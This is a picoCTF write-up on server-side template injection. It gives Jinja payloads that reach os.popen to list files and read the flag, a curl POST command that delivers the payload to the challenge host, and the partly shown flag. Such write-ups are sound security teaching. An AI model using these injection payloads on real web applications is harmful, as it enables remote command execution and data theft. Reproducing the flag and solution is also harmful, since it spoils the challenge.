Challenge Overview
I made a cool website where you can announce whatever you want! Try it out!
I heard templating is a cool and modular way to build web apps! Check out my website here!
Solution
If you put in any value it just repeats it and you can mess around with the inputs but the following are the ones that allow you to run commands.
By putting this in the field and pressing Ok you can see the contents listed: {{ cycler.__init__.__globals__.os.popen('ls -la').read() }}
From here you can see that the flag file is just called flag and you can print it out with this: {{ cycler.__init__.__globals__.os.popen('cat flag').read() }}
After that runs the flag should be printed out on the webpage.
On the challenge it said it was browser_webshell_solvable so here is an alternative solution that works under only the command line. First you can you curl command to see the html: curl http://rescued-float.picoctf.net:52534/
This is the key part to look at:
<form action="/" method="POST">
What do you want to announce: <input name="content" id="announce">
<button type="submit"> Ok </button>
</form>
Then based on that you can use curl -X POST -d "content=Hey" http://rescued-float.picoctf.net:52534/ to get to the page but it redirects so you can use the -L flag or just use wget instead to get to the redirected page. This command gives the flag:
curl -L -X POST -d "content={{ cycler.__init__.__globals__.os.popen('cat flag').read() }}" http://rescued-float.picoctf.net:52534/
If you wanted to take it a step further you could direct the output of curl into a file and run this command:
cat file | grep -E picoCTF{.*} | cut -d ">" -f2 | cut -d "<" -f1 > flag.txt
And then cat flag.txt to get the flag in that way.
Flag: picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_ae48...}